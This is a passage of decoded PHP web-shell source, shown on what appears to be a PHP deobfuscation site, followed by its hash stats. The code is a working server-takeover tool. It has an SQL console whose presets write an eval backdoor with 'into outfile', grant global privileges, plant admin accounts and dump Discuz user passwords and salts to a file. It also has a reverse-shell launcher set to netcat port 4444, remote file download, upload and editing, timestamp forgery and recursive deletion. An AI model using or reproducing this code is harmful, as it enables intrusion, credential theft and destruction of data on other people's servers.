'<h1>'.$type.'</h1>';}break;case "Oracle" : if(function_exists('oci_close')){$conn = @oci_connect($sqluser,$sqlpass,$sqlhost.'/'.$sqlname);if($conn) {$msg = '<h2>'.$type.' </h2>';$stid = oci_parse($conn,$sqlcode);oci_execute($stid);if($stid) { $msg .= '<h2> - SQL</h2>'; while (($array = oci_fetch_array($stid,OCI_ASSOC))) { $rows[] = $array; } }else { $msg .= '<h1> - SQL</h1>'; $e = oci_error(); $rows = array('error' => $e['message']); }oci_free_statement($stid);} else {$e = oci_error(); $rows = array('error' => $e['message']);$msg = '<h1>'.$type.'</h1>';}@oci_close($conn);} else {$msg = '<h1>'.$type.'</h1>';}break;case "MySql" : if(function_exists('mysql_close')){$conn = mysql_connect(strstr($sqlhost,':') ? $sqlhost : $sqlhost.':3306',$sqluser,$sqlpass,$sqlname);if($conn) {$msg = '<h2>'.$type.' </h2>';if(substr($sqlcode,0,6) == 't00lsa') {$array = array(); $data = ''; $i = 0;preg_match_all('/t00lsa\s*\'(.*)\'\s*t00lsb\s*\'(.*)\'\s*t00lsc\s*\'(.*)\'\s*t00lsfile\s*\'(.*)\'/i',$sqlcode,$array);if($array[1][0] && $array[2][0] && $array[3][0] && $array[4][0]) {mysql_select_db($array[1][0],$conn);mysql_query('set names '.$names,$conn);$spidercode = 'select '.$array[3][0].' from `'.$array[2][0].'`;';$result = mysql_query($spidercode,$conn);if($result) {while($row = mysql_fetch_array($result,MYSQL_ASSOC)) { $data .= join('{~}',$row)."\r\n"; $i++; }if($data) {$file = strdir($array[4][0]);$msg .= filew($file,$data,'w') ? '<h2> - </h2>' : '<h1> - </h1>';$rows = array('file' => $file,size(filesize($file)) => ''.$i.'');}else { $msg .= '<h1> - </h1>'; }}else { $msg .= '<h1> - SQL</h1>'; $rows = array('errno' => mysql_errno(),'error' => mysql_error()); }}else { $msg .= '<h1> - </h1>'; }} elseif(!empty($sqlcode)) {mysql_select_db($sqlname,$conn);mysql_query('set names '.$names,$conn);$result = mysql_query($sqlcode,$conn);if($result) { $msg .= '<h2> - SQL</h2>'; while($array = mysql_fetch_array($result,MYSQL_ASSOC)) { $rows[] = $array; } }else { $msg .= '<h1> - SQL</h1>'; $rows = array('errno' => mysql_errno(),'error' => mysql_error()); }}mysql_free_result($result);} else {$msg = '<h1>'.$type.'</h1>';$rows = array('errno' => mysql_errno(),'error' => mysql_error());}mysql_close($conn);} else {$msg = '<h1>'.$type.'</h1>';}break;}} else {$type = 'MySql';$sqlhost = 'localhost:3306';$sqluser = 'root';$sqlpass = '123456';$sqlname = 'mysql';$sqlcode = 'select version();';$names = 'gbk';}echo '<div class="msgbox">'.$msg.'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="sql">';echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>';echo '<tr><td></td><td>';$dbs = array('MySql','MsSql','Oracle','PostgreSql');foreach($dbs as $dbname) { echo '<label><input type="radio" name="type" value="'.$dbname.'"'.($type == $dbname ? ' checked' : '').'>'.$dbname.'</label> '; }echo '</td></tr><tr><td></td><td> <input type="text" name="sqlhost" style="width:188px;" value="'.$sqlhost.'"> ';echo ' <input type="text" name="sqluser" style="width:108px;" value="'.$sqluser.'"> ';echo ' <input type="text" name="sqlpass" style="width:108px;" value="'.$sqlpass.'"> ';echo ' <input type="text" name="sqlname" style="width:108px;" value="'.$sqlname.'"></td></tr>';echo '<tr><td><br>';echo '<select onchange="$(\'sqlcode\').value=options[selectedIndex].value">';echo '<option value="select version();">------</option>';echo '<option value="select \'<?php eval ($_POST[cmd]);?>\' into outfile \'D:/web/shell.php\';"></option>';echo '<option value="GRANT ALL PRIVILEGES ON *.* TO \''.$sqluser.'\'@\'%\' IDENTIFIED BY \''.$sqlpass.'\' WITH GRANT OPTION;"></option>';echo '<option value="show variables;"></option>';echo '<option value="create database t00ls;"></option>';echo '<option value="create table `t00ls` (`id` INT(10) NOT NULL ,`user` VARCHAR(32) NOT NULL ,`pass` VARCHAR(32) NOT NULL) TYPE = MYISAM;"></option>';echo '<option value="show databases;"></option>';echo '<option value="show tables from `'.$sqlname.'`;"></option>';echo '<option value="show columns from `'.$sqlname.'`;"></option>';echo '<option value="drop table `t00ls`;"></option>';echo '<option value="select * from `pre_ucenter_members` limit 0,30;"></option>';echo '<option value="insert into `admin` (`user`,`pass`) values (\'t00ls\', \'f1a81d782dea6a19bdca383bffe68452\');"></option>';echo '<option value="update `admin` set `user` = \'t00ls1\',`pass` = \'50de237e389600acadbeda3d6e6e0b1f\' where `user` = \'t00ls\' and `pass` = \'f1a81d782dea6a19bdca383bffe68452\' limit 1;"></option>';echo '<option value="t00lsa \'discuzx25\' t00lsb \'pre_ucenter_members\' t00lsc \'username,password,salt,email\' t00lsfile \''.THISDIR.'out.txt\';">(MySql)</option>';echo '</select>';echo '</td><td><textarea name="sqlcode" id="sqlcode" style="width:680px;height:80px;">'.htmlspecialchars($sqlcode).'</textarea></td></tr>';echo '<tr><td></td><td><select name="names">';$charsets = array('gbk','utf8','big5','latin1','cp866','ujis','euckr','koi8r','koi8u');foreach($charsets as $charset) { echo '<option value="'.$charset.'"'.($names == $charset ? ' selected' : '').'>'.$charset.'</option>'; }echo '</select> <input type="submit" style="width:80px;" value=""></td></tr>';echo '</table></form>';if($rows) {echo '<pre style="padding:5px;background:#F8F8F8;text-align:left;">';ob_start();print_r($rows);$out = ob_get_contents();ob_end_clean();if(preg_match('~[\x{4e00}-\x{9fa5}]+~u',$out) && function_exists('iconv')) { $out = @iconv('UTF-8','GBK',$out); }echo htmlspecialchars($out);echo '</pre>';}break;case "backshell" : if((!empty($_POST['backip'])) && (!empty($_POST['backport']))) {$backip = $_POST['backip'];$backport = $_POST['backport'];$temp = $_POST['temp'] ? $_POST['temp'] : '/tmp';$type = $_POST['type'];$msg = backshell($backip,$backport,$temp,$type);} else {$backip = $_SERVER['REMOTE_ADDR'] ? $_SERVER['REMOTE_ADDR'] : getenv('REMOTE_ADDR');$backport = '4444';$temp = '/tmp';$type = 'pl';}echo '<div class="msgbox">'.$msg.'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="backshell">';echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>';echo '<tr><td></td><td><input type="text" name="backip" style="width:268px;" value="'.$backip.'"> (Your ip)</td></tr>';echo '<tr><td></td><td><input type="text" name="backport" style="width:268px;" value="'.$backport.'"> (nc -vvlp '.$backport.')</td></tr>';echo '<tr><td></td><td><input type="text" name="temp" style="width:268px;" value="'.$temp.'"> (Only Linux)</td></tr>';echo '<tr><td></td><td>';$types = array('pl' => 'Perl','py' => 'Python','cbin' => 'C-Bin','php' => 'PHP','phpwin' => 'WIN-PHP');foreach($types as $key => $name) { echo '<label><input type="radio" name="type" value="'.$key.'"'.($key == $type ? ' checked' : '').'>'.$name.'</label> '; }echo '</td></tr><tr><td></td><td><input type="submit" style="width:80px;" value=""></td></tr>';echo '</table></form>';break;case "edit" : case "editor" : $file = strdir($_POST['godir'].'/'.$_POST['govar']);if(!file_exists($file)) {$msg = '';} else {$code = filer($file);$chst = '';if(preg_match('~[\x{4e00}-\x{9fa5}]+~u',$code)) { $chst = 'utf-8'; }$size = size(filesize($file));$msg = ' '.substr(decoct(fileperms($file)),-4).'  '.$size.'  '.$chst.'';}echo base64_decode('PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQp2YXIgbiA9IDA7DQpmdW5jdGlvbiBzZWFyY2goc3RyKSB7DQoJdmFyIHR4dCwgaSwgZm91bmQ7DQoJaWYoc3RyID09ICIiKSByZXR1cm4gZmFsc2U7DQoJdHh0ID0gJCgnZmlsZWNvZGUnKS5jcmVhdGVUZXh0UmFuZ2UoKTsNCglmb3IoaSA9IDA7IGkgPD0gbiAmJiAoZm91bmQgPSB0eHQuZmluZFRleHQoc3RyKSkgIT0gZmFsc2U7IGkrKyl7DQoJCXR4dC5tb3ZlU3RhcnQoImNoYXJhY3RlciIsIDEpOw0KCQl0eHQubW92ZUVuZCgidGV4dGVkaXQiKTsNCgl9DQoJaWYoZm91bmQpeyB0eHQubW92ZVN0YXJ0KCJjaGFyYWN0ZXIiLCAtMSk7IHR4dC5maW5kVGV4dChzdHIpOyB0eHQuc2VsZWN0KCk7IHR4dC5zY3JvbGxJbnRvVmlldygpOyBuKys7IH0NCgllbHNlIHsgaWYgKG4gPiAwKSB7IG4gPSAwOyBzZWFyY2goc3RyKTsgfSBlbHNlIGFsZXJ0KHN0ciArICIuLi4gTm90LUZpbmQiKTsgfQ0KCXJldHVybiBmYWxzZTsNCn0NCjwvc2NyaXB0Pg==');echo '<div class="msgbox"><input name="keyword" id="keyword" type="text" style="width:138px;height:15px;"><input type="button" value="IE" onclick="search($(\'keyword\').value);"> - '.$msg.'</div>';echo '<form name="editfrm" id="editfrm" method="POST">';subeval();echo '<input type="hidden" name="go" value=""><input type="hidden" name="act" id="act" value="edit">';echo '<input type="hidden" name="dir" id="dir" value="'.dirname($file).'">';echo '<div class="actall"> <input type="text" name="filename" value="'.$file.'" style="width:662px;"> ';echo '</div><div class="actall"><textarea name="filecode" id="filecode" style="width:698px;height:358px;">'.htmlspecialchars($code).'</textarea></div></form>';echo '<div class="actall" style="padding:5px;padding-right:68px;"><input type="button" onclick="$(\'editfrm\').submit();" value="" style="width:80px;"> ';echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="'.dirname($file).'">';subeval();echo '<input type="button" onclick="$(\'backfrm\').submit();" value="" style="width:80px;"></form></div>';break;case "upfiles" : $updir = isset($_POST['updir']) ? $_POST['updir'] : $_POST['godir'];$msg = ' '.get_cfg_var("upload_max_filesize").' POST '.get_cfg_var("post_max_size").'';$max = 10;if(isset($_FILES['uploads']) && isset($_POST['renames'])) {$uploads = $_FILES['uploads'];$msgs = array();for($i = 1;$i < $max;$i++) {if($uploads['error'][$i] == UPLOAD_ERR_OK) {$rename = $_POST['renames'][$i] == '' ? $uploads['name'][$i] : $_POST['renames'][$i];$filea = $uploads['tmp_name'][$i];$fileb = strdir($updir.'/'.$rename);$msgs[$i] = fileu($filea,$fileb) ? '<br><h2> '.$rename.'</h2>' : '<br><h1> '.$rename.'</h1>';}}}echo '<div class="msgbox">'.$msg.'</div>';echo '<form name="upsfrm" id="upsfrm" method="POST" enctype="multipart/form-data">';subeval();echo '<input type="hidden" name="go" value="upfiles"><input type="hidden" name="act" id="act" value="upload">';echo '<div class="actall"><p> <input type="text" name="updir" style="width:398px;" value="'.$updir.'"></p>';for($i = 1;$i < $max;$i++) { echo '<p>'.$i.' <input type="file" name="uploads['.$i.']" style="width:300px;">  <input type="text" name="renames['.$i.']" style="width:128px;"> '.$msgs[$i].'</p>'; }echo '</div></form><div class="actall" style="padding:8px;padding-right:68px;"><input type="button" onclick="$(\'upsfrm\').submit();" value="" style="width:80px;"> ';echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="'.$updir.'">';subeval();echo '<input type="button" onclick="$(\'backfrm\').submit();" value="" style="width:80px;"></form></div>';break;default : if(isset($_FILES['upfile'])) {if($_FILES['upfile']['name'] == '') { $msg = '<h1></h1>'; }else { $rename = $_POST['rename'] == '' ? $_FILES['upfile']['name'] : $_POST['rename']; $filea = $_FILES['upfile']['tmp_name']; $fileb = strdir($nowdir.$rename); $msg = fileu($filea,$fileb) ? '<h2>'.$rename.'</h2>' : '<h1>'.$rename.'</h1>'; }}if(isset($_POST['act'])) {switch($_POST['act']) {case "a" : if(!$_POST['files']) { $msg = '<h1> '.$_POST['var'].'</h1>'; }else { $i = 0; foreach($_POST['files'] as $file) { $i += @copy(strdir($nowdir.$file),strdir($_POST['var'].'/'.$file)) ? 1 : 0; } $msg =  $msg = $i ? '<h2> '.$i.' '.$_POST['var'].'</h2>' : '<h1> '.$i.' '.$_POST['var'].'</h1>'; }break;case "b" : if(!$_POST['files']) { $msg = '<h1></h1>'; }else { $i = 0; foreach($_POST['files'] as $file) { $i += @unlink(strdir($nowdir.$file)) ? 1 : 0; } $msg = $i ? '<h2> '.$i.' </h2>' : '<h1> '.$i.' </h1>'; }break;case "c" : if(!$_POST['files']) { $msg = '<h1> '.$_POST['var'].'</h1>'; }elseif(!ereg("^[0-7]{4}$",$_POST['var'])) { $msg = '<h1></h1>'; }else { $i = 0; foreach($_POST['files'] as $file) { $i += @chmod(strdir($nowdir.$file),base_convert($_POST['var'],8,10)) ? 1 : 0; } $msg = $i ? '<h2> '.$i.' '.$_POST['var'].'</h2>' : '<h1> '.$i.' '.$_POST['var'].'</h1>'; }break;case "d" : if(!$_POST['files']) { $msg = '<h1> '.$_POST['var'].'</h1>'; }elseif(!preg_match('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/',$_POST['var'])) { $msg = '<h1> '.$_POST['var'].'</h1>'; }else { $i = 0; foreach($_POST['files'] as $file) { $i += @touch(strdir($nowdir.$file),strtotime($_POST['var'])) ? 1 : 0; } $msg = $i ? '<h2> '.$i.' '.$_POST['var'].'</h2>' : '<h1> '.$i.' '.$_POST['var'].'</h1>'; }break;case "e" : $path = strdir($nowdir.$_POST['var'].'/');if(file_exists($path)) { $msg = '<h1> '.$_POST['var'].'</h1>'; }else { $msg = @mkdir($path,0777) ? '<h2> '.$_POST['var'].' </h2>' : '<h1> '.$_POST['var'].' </h1>'; }break;case "f" : $context = array('http' => array('timeout' => 30));if(function_exists('stream_context_create')) { $stream = stream_context_create($context); }$data = @file_get_contents ($_POST['var'],false,$stream);$file = array_pop(explode('/',$_POST['var']));if($data) { $msg = filew(strdir($nowdir.$file),$data,'wb') ? '<h2> '.$file.' </h2>' : '<h1> '.$file.' </h1>'; } else { $msg = '<h1></h1>'; }break;case "rf" : $files = explode('|x|',$_POST['var']);if(count($files) != 2) { $msg = '<h1></h1>'; }else { $msg = @rename(strdir($nowdir.$files[1]),strdir($nowdir.$files[0])) ? '<h2> '.$files[1].'  '.$files[0].' </h2>' : '<h1> '.$files[1].'  '.$files[0].' </h1>'; }break;case "pd" : $files = explode('|x|',$_POST['var']);if(count($files) != 2) { $msg = '<h1></h1>'; }else { $path = strdir($nowdir.$files[1]); $msg = @chmod($path,base_convert($files[0],8,10)) ? '<h2>'.$files[1].''.$files[0].'</h2>' : '<h1>'.$files[1].''.$files[0].'</h1>'; }break;case "edit" : if(isset($_POST['filename']) && isset($_POST['filecode'])) { $msg = filew($_POST['filename'],$_POST['filecode'],'w') ? '<h2> '.$_POST['filename'].'</h2>' : '<h1> '.$_POST['filename'].'</h1>'; }break;case "deltree" : $deldir = strdir($nowdir.$_POST['var'].'/');if(!file_exists($deldir)) { $msg = '<h1> '.$_POST['var'].' </h1>'; }else { $msg = deltree($deldir) ? '<h2> '.$_POST['var'].' </h2>' : '<h1> '.$_POST['var'].' </h1>'; }break;}}$chmod = substr(decoct(fileperms($nowdir)),-4);if(!$chmod) { $msg .= ' - <h1></h1>'; }$array = showdir($nowdir);$thisurl = strdir('/'.strtr($nowdir,array(ROOTDIR => '')).'/');$nowdir = strtr($nowdir,array('\'' => '%27','"' => '%22'));echo '<div class="msgbox">'.$msg.'</div>';echo '<div class="actall"><form name="frm" id="frm" method="POST">';subeval();echo (is_writable($nowdir) ? '<h2></h2>' : '<h1></h1>').' <input type="text" name="dir" id="dir" style="width:508px;" value="'.strdir($nowdir.'/').'"> ';echo '<input type="button" onclick="$(\'frm\').submit();" style="width:50px;" value=""> ';echo '<input type="button" onclick="cd(\''.ROOTDIR.'\');" style="width:68px;" value=""> ';echo '<input type="button" onclick="cd(\''.THISDIR.'\');" style="width:68px;" value=""> ';echo '<select onchange="cd(options[selectedIndex].value);">';echo '<option>------</option>';echo '<option value="C:/RECYCLER/">Win-RECYCLER</option>';echo '<option value="C:/$Recycle.Bin/">Win-$Recycle</option>';echo '<option value="C:/Program Files/">Win-Program</option>';echo '<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup/">Win-Startup</option>';echo '<option value="C:/Documents and Settings/All Users////">Win-</option>';echo '<option value="C:/Windows/Temp/">Win-TEMP</option>';echo '<option value="/usr/local/">Linux-local</option>';echo '<option value="/tmp/">Linux-tmp</option>';echo '<option value="/var/tmp/">Linux-var</option>';echo '<option value="/etc/ssh/">Linux-ssh</option>';echo '</select></form></div><div class="actall">';echo '<input type="button" value="" onclick="nf(\'edit\',\'newfile.php\');" style="width:68px;"> ';echo '<input type="button" value="" onclick="txts(\'\',\'newdir\',\'e\');" style="width:68px;"> ';echo '<input type="button" value="" onclick="txts(\'\',\'http://www.baidu.com/cmd.exe\',\'f\');" style="width:68px;"> ';echo '<input type="button" value="" onclick="go(\'upfiles\',\''.$nowdir.'\');" style="width:68px;"> ';echo '<form name="upfrm" id="upfrm" method="POST" enctype="multipart/form-data">';subeval();echo '<input type="hidden" name="dir" id="dir" value="'.$nowdir.'">';echo '<input type="file" name="upfile" style="width:286px;height:21px;"> ';echo '<input type="button" onclick="$(\'upfrm\').submit();" value="" style="width:50px;"> ';echo ' <input type="text" name="rename" style="width:128px;">';echo '</form></div>';echo '<form name="frm1" id="frm1" method="POST"><table class="tables">';subeval();echo '<input type="hidden" name="dir" id="dir" value="'.$nowdir.'">';echo '<input type="hidden" name="act" id="act" value="">';echo '<input type="hidden" name="var" id="var" value="">';echo '<th><a href="javascript:cd(\''.dirname($nowdir).'/\');"></a></th><th style="width:8%"></th><th style="width:5%"></th><th style="width:17%"></th><th style="width:17%"></th><th style="width:8%"></th>';if($array) {asort($array['dir']);asort($array['file']);$dnum = $fnum = 0;foreach($array['dir'] as $path => $name) {$prem = substr(decoct(fileperms($path)),-4);$ctime = date('Y-m-d H:i:s',filectime($path));$mtime = date('Y-m-d H:i:s',filemtime($path));echo '<tr>';echo '<td><a href="javascript:cd(\''.$nowdir.$name.'\');"><b>'.strtr($name,array('%27' => '\'','%22' => '"')).'</b></a></td>';echo '<td><a href="javascript:dels(\''.$name.'\');"></a> ';echo '<a href="javascript:acts(\''.$name.'\',\'rf\',\''.$name.'\');"></a></td>';echo '<td><a href="javascript:acts(\''.$prem.'\',\'pd\',\''.$name.'\');">'.$prem.'</a></td>';echo '<td>'.$ctime.'</td>';echo '<td>'.$mtime.'</td>';echo '<td>-</td>';echo '</tr>';$dnum++;}foreach($array['file'] as $path => $name) {$prem = substr(decoct(fileperms($path)),-4);$ctime = date('Y-m-d H:i:s',filectime($path));$mtime = date('Y-m-d H:i:s',filemtime($path));$size = size(filesize($path));echo '<tr>';echo '<td><input type="checkbox" name="files[]" value="'.$name.'"><a target="_blank" href="'.$thisurl.$name.'">'.strtr($name,array('%27' => '\'','%22' => '"')).'</a></td>';echo '<td><a href="javascript:go(\'edit\',\''.$name.'\');"></a> ';echo '<a href="javascript:acts(\''.$name.'\',\'rf\',\''.$name.'\');"></a></td>';echo '<td><a href="javascript:acts(\''.$prem.'\',\'pd\',\''.$name.'\');">'.$prem.'</a></td>';echo '<td>'.$ctime.'</td>';echo '<td>'.$mtime.'</td>';echo '<td align="right"><a href="javascript:go(\'down\',\''.$name.'\');">'.$size.'</a></td>';echo '</tr>';$fnum++;}}unset($array);echo '</table>';echo '<div class="actall" style="text-align:left;">';echo '<input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> ';echo '<input type="button" value="" style="width:50px;" onclick=\'txts("","'.$nowdir.'","a");\'> ';echo '<input type="button" value="" style="width:50px;" onclick=\'dels("b");\'> ';echo '<input type="button" value="" style="width:50px;" onclick=\'txts("","0666","c");\'> ';echo '<input type="button" value="" style="width:50px;" onclick=\'txts("","'.$mtime.'","d");\'> ';echo '<input type="button" value="" style="width:50px;" onclick=\'txts("","'.strtr($_SERVER['HTTP_HOST'],array(':' => '_','.' => '_')).'.zip","p");\'> ';echo '['.$dnum.'] - ['.$fnum.'] - ['.$chmod.']</div></form>';break;}?><div class="footag"><?php echo php_uname().'<br>'.$_SERVER['SERVER_SOFTWARE'];?></div></div></div></body></html><?php unset($array);exit;?>

Function Calls

None

Variables

None

Stats

MD5	97bc6ffec32d9a9c98d674d257251a1e
Eval Count	0
Decode Time	380 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats